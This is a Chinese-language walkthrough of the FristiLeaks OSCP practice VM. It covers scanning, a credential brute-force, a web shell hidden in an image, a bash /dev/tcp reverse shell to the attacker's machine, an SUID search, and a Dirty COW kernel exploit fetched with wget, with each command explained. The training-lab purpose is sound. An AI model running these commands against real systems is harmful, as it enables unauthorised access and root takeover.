当前位置:   article > 正文

OSCP推荐靶场-FristiLeaks_oscp靶场

oscp靶场

1、环境部署

下载之后需要改一下靶机的MAC地址

2、扫描网段

  1. #扫描局域网内的ip连接
  2. sudo arp-scan -l
  3. #扫描这个网段内哪些ip是开放的
  4. nmap -sn 192.168.23.1/24 -r --min-rate 255

可以看到这个是目标靶机的ip地址

使用nmap扫描一下端口

nmap -A 192.168.23.129 --min-rate 8888 -oA nmap_result/attack
  • -A: 这个选项启用了一些常用的扫描技术,包括操作系统检测、服务版本检测、脚本扫描等。

  • 192.168.23.129: 这是您想要扫描的目标主机的IP地址。

  • --min-rate 8888: 这个选项指定了发送扫描请求的最小速率,即在扫描中发送数据包的最小速度。在这个命令中,扫描请求的速率被设置为每秒8888个包。

  • -oA: 这是一个输出选项,用于指定扫描结果的保存格式和文件名前缀。在这个命令中,-oA 指定将扫描结果保存为三种格式的文件:.nmap(包含扫描的原始结果)、.gnmap(以grep友好的格式保存)和 .xml(以XML格式保存)。

  • nmap_result/attack: 这是指定输出文件的路径和文件名前缀。在这个命令中,扫描结果文件将保存在 nmap_result 文件夹中,并且文件名前缀为 attack

3、扫描目录

python3 dirsearch.py -u http://192.168.23.129/

 4、查看图片的信息

  1. strings ***.png
  2. exiftool keep-calm.png

5、fuzz测试进入登录界面

这里也有张图片,猜测是密码

查看图片内容发现新账号

6、bp抓包进行账号和密码爆破

7、登录成功之后,图片马

8、反弹shell(或者蚁剑)

  1. #192.168.23.128是本机的IP,2233是本机监听的端口
  2. sh -i >& /dev/tcp/192.168.23.128/2233 0>&1

  1. sh: 这是Shell程序的名称,它会启动一个新的Shell会话。

  2. -i: 这个选项表示要以交互模式运行Shell,即用户可以与Shell进行交互输入和输出。

  3. >&: 这是一个I/O重定向操作符,它将一个文件描述符(在这里是标准输出)连接到另一个文件描述符。

  4. /dev/tcp/192.168.23.129/2233: 这部分指定了连接的目标IP地址和端口号。在这个命令中,它尝试连接到IP地址为192.168.23.129的计算机的2233端口。

  5. 0>&1: 这部分将标准输入(文件描述符0)重定向到标准输出(文件描述符1)。这样做的效果是,命令的标准输入会与网络套接字的输出连接,从而允许远程计算机发送命令到被攻击者的计算机。

 

拿到shell

蚁剑(图片马的内容不同):

  1. #进入bash
  2. python -c 'import pty;pty.spawn("/bin/bash")'

8、查找setuid程序,setuid程序提权

find / -perm -u=s 2>/dev/null

这个命令用于在Linux系统上查找具有SetUID权限的可执行文件。SetUID(Set User ID)是一种特殊的权限,它允许一个程序在执行时以文件所有者的身份运行,而不是执行者的身份。这通常用于提供一些特定的特权,例如允许普通用户执行只有管理员可以运行的程序。

现在让我来解释这个命令的各个部分:

  • find: 这是Linux系统上的一个用于查找文件和目录的命令。

  • /: 这是查找的起始路径,表示从根目录开始搜索。

  • -perm -u=s: 这部分是find命令的参数,用于指定搜索条件。-perm表示按照文件权限进行搜索。-u=s表示查找具有SetUID权限的文件。在这里,-u表示用户权限,s表示SetUID权限。

  • 2>/dev/null: 这部分是用于重定向错误消息的。2代表标准错误输出(stderr),>/dev/null表示将错误消息重定向到特殊文件/dev/null,这样错误消息就会被丢弃,不会显示在终端上。

 找到的setuid程序和msf列表进行比对,看看能不能提权

 

9、数据库提权 

whereis lib_mysqludf_sys.so

没有这个库,不能进行提权。 

10、内核提权

  1. #查看内核版本
  2. uname -a

  1. #用于在Exploit Database(Exploit数据库)中搜索漏洞利用代码的命令行工具。你可以使用它来查找特定软#件或系统版本的漏洞利用代码。在你的请求中,你想要搜索Linux Kernel版本2.6.32的漏洞利用代码。
  2. searchsploit Linux Kernel 2.6.32

通过脏牛漏洞提权

可以进到tmp目录里面,这个里面权限会高一点。

 在靶机上面下载

  1. python3 -m http.server --bind 0.0.0.0 21568
  2. wget 192.168.23.128:21568/***.c

11、拿到root权限

 

声明:本文内容由网友自发贡献,转载请注明出处:【wpsshop博客】
推荐阅读
相关标签
  

闽ICP备14008679号